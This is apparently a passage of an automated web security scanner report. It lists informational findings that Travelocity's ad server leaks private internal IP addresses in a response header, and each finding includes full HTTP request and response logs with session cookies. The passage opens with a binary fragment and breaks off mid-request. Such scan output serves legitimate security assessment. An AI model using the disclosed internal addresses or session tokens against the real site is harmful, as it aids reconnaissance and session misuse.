Date: Mon, 03 Oct 2011 00:02:18 GMT
Connection: close

CWS.....x.}X.W.Yz._.n.$@B 0.Qnd.p!    ...l3...0.....m.P.t..-U1R    pOO...I.g..d.3..U6Yd.Mrf.....n...&.e.?..n.@..    ....w...
.....t.=!.@..N.B~..w .F.dg.....Z.idqw.B..6.....Vj.R....'.]...L...&.b......    .1ra..p.5
...[SNIP]...
23.7. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529178&tile=711446054649628§ion=results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529178&tile=711446054649628&section=results

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529178&tile=711446054649628&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:00 GMT
Server: Apache
X-Server: prdlmn4008
AdServer: 10.28.75.14:9678:1
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:00 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1
Content-Type: text/html

23.8. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344§ion=results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:26 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:14:26 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 2262
Content-Type: text/html

<IFRAME SRC="http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2;sz=160x600;click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d127075%26AdID%3d169968%26TargetID%3d32592
...[SNIP]...
23.9. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219§ion=details  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; mbox=session#1317600481056-80236#1317602524|PC#1317600481056-80236.19#1318810264|check#true#1317600724

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:46 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:12:46 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 2276
Content-Type: text/html

<IFRAME SRC="http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2;sz=160x600;click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d127075%26AdID%3d169968%26TargetID%3d32592
...[SNIP]...
23.10. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628§ion=results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:01 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:01 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 239
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21044;
var kadwidth=160;
var kadheight=600;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmati
...[SNIP]...
23.11. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344§ion=results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:28 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:14:28 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 239
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21044;
var kadwidth=160;
var kadheight=600;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmati
...[SNIP]...
23.12. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628§ion=results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=529164&tile=711446054649628&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:01 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:01 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 1
Content-Type: text/html

23.13. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344§ion=results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&adloc=NA&random=771852&tile=128609801075344&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:25 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:14:25 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 238
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21043;
var kadwidth=728;
var kadheight=90;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmatic
...[SNIP]...
23.14. http://dm.travelocity.com/html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219§ion=details  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219&section=details

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/adsize=728x90&site=travelocity&cobrand=TRAVELOCITY&locale=en&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&adloc=NA&random=656361&tile=564238840132219&section=details HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; mbox=session#1317600481056-80236#1317602524|PC#1317600481056-80236.19#1318810264|check#true#1317600724

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:44 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:12:44 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 238
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21043;
var kadwidth=728;
var kadheight=90;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmatic
...[SNIP]...
23.15. http://dm.travelocity.com/html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/site=travelocity&adsize=728x90&cobrand=TRAVELOCITY&area=homepage&Section=frontdoor&tile=60048504&random=-99147040413176? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:13 GMT
Server: Apache
X-Server: prdlmn3110
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:13 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 884
Content-Type: text/html

<a href="http://dm.travelocity.com/event.ng/Type=click&FlightID=83479&AdID=152818&TargetID=8870&ASeg=&AMod=&AOpt=0&Segments=1,9,3090,5796,5878,9520,10495,11148,12670,20052,20299,20311,22041,22251,2230
...[SNIP]...
23.16. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=homepage&tile=991496234131760&transactionID=703831317600485&random=914961581317600? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.travelocity.com/472a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; mbox=check#true#1317600542|session#1317600481056-80236#1317602342|PC#1317600481056-80236.19#1318810083; __utma=97304794.100809678.1317600495.1317600495.1317600495.1; __utmb=97304794.1.10.1317600495; __utmc=97304794; __utmz=97304794.1317600495.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:08:19 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.27:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:08:19 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 896
Content-Type: text/html

<a href="http://dm.travelocity.com/event.ng/Type=click&FlightID=125327&AdID=178801&TargetID=31769&ASeg=&AMod=&AOpt=0&Segments=1,9,3090,5714,5796,9520,10495,11148,12670,20052,20299,20311,22041,22251,22
...[SNIP]...
23.17. http://dm.travelocity.com/html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel§ion=wait&dest=BOS&random=042027615  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&dest=BOS&random=042027615

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /html.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=300x250&area=hotel&section=wait&dest=BOS&random=042027615? HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelCobrand.do
Accept-Encoding: gzip,deflate,sdch
